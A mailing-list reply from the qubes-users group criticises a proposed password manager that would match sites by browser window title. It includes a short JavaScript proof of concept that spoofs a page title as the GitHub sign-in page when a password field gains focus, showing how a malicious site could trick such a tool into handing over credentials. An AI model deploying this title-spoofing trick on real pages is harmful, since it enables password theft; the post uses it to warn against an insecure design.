Re: [qubes-users] Simple Dom0 password manager for an imperfect-but-strong security upgrade?

Thu, 30 Mar 2017 17:49:33 -0700 

On Thu, Mar 30, 2017 at 6:21 PM, Shane Optima <optima.sh...@gmail.com> wrote:
> Maybe if you (or someone) could write a Firefox extension to modify all 
> browser page titles to be a concatenation of the page title and a short token 
> of characters generated from a salted hash of the URL (so that I don't have 
> to deal with any more hyperbole out of people like M. Ouelette), I could 
> write the Dom0 bash bit. Or vice versa. Couldn't promise delivery on a tight 
> deadline, though.

If you're going to write an extension then there's no reason to use
window titles since you could communicate over another channel which
is not under full attacker control by default, and wouldn't have
negative UX side-effects of abusing window titles as a communication
mechanism.

Furthermore, it's not hyperbole. Here's a super simple (but likely
quite effective!) exploit which took me a about two minutes to write:

(function() {
  var attack_target = 'Sign in to GitHub ยท GitHub';
  var saved_title = '';
  var pw = document.querySelector('#password');
  pw.addEventListener('focus', function() {
      saved_title = document.title;
      if (Math.random() < 0.2)
        document.title = attack_target;
  });
  pw.addEventListener('blur', function() {
    document.title = saved_title;
  });
})();

What you are proposing is simply too dangerous and easy to exploit.
For most threat models, passwords would honestly be safer if saved in
the browser. For the safety of yourself and others, please don't
implement this using window titles as proposed.

Don't get me wrong, your fundamental concept is a good idea, but only
if the password manager authenticates the requesting site in a secure
way. Window titles are absolutely not the way to do that, not even for
an initial version.

-- 
You received this message because you are subscribed to the Google Groups 
"qubes-users" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to qubes-users+unsubscr...@googlegroups.com.
To post to this group, send email to qubes-users@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/qubes-users/CABQWM_An4gJZ%2BbY4i5j7j07iz9AVkp27JcCpxxjHGMDmD_kjcQ%40mail.gmail.com.
For more options, visit https://groups.google.com/d/optout.

Reply via email to